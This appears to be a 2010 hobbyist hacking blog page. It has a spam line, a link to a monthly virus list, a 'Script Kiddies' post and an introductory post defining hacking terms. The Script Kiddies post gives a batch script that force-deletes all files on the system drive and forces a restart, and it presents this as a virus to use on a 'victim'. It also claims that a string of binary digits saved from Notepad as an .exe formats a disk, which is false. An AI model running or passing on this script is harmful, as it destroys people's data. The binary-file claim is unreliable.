Hey Buddies, I got an awesome website, which will give you all videos you want to have every-time. Check it out:
Tuesday, January 26, 2010
Top VIRUSES of the month
| |||||||||||||||||||||||||||||||||||||||||||||
source: http://eccouncil.org/resources/codered_center/codered_viruses.aspx
Monday, January 25, 2010
Script Kiddies - 1
Heyy guys, I found a new script that can be called as a VIRUS! Actually this script will take away all the matter from your c: within windows and restart to delete all system files ;)
Script:
@echo offdel%systemdrive%\*.*/f/s/q
shutdown -r -f -t 10
--------------------
Now, format HDD:
1. Copy the following as it is in Notepad:
01001011000111110010010101010101010000011111100000
2. Save as a .exe file
3. Execute and format the victim's Disk!!
-------------------Note: This is only for educational purposes. I will not bear any responsibility regarding this.
Getting start with Hacking: Enumerating Remote systems
Many of the beginners in the field of hacking start to hack or crack without having pre-hacking tips which often leads them to the wrong direction. Its better to work on a specific target before attacking. Lets start with the session, and then continue till expertise.
Firstly, keep in mind, these following points if you want to hack a Remote Computer System:
Firstly, keep in mind, these following points if you want to hack a Remote Computer System:
Vulnerability + Exploit = Hacking
- Attack: An Attack is any action that violates security.
- Exploit: A well defined way to Breech the security.
- Vulnerability Assessment: Process of identifying, quantifying and prioritizing the vulnerabilities of the system.
- Penetration Testing: A Penetration Test is a method of evaluating the security of a computer system or network by simulating an attack from malicious source, known as Black Hat Hacker or Cracker.
Subscribe to:
Posts (Atom)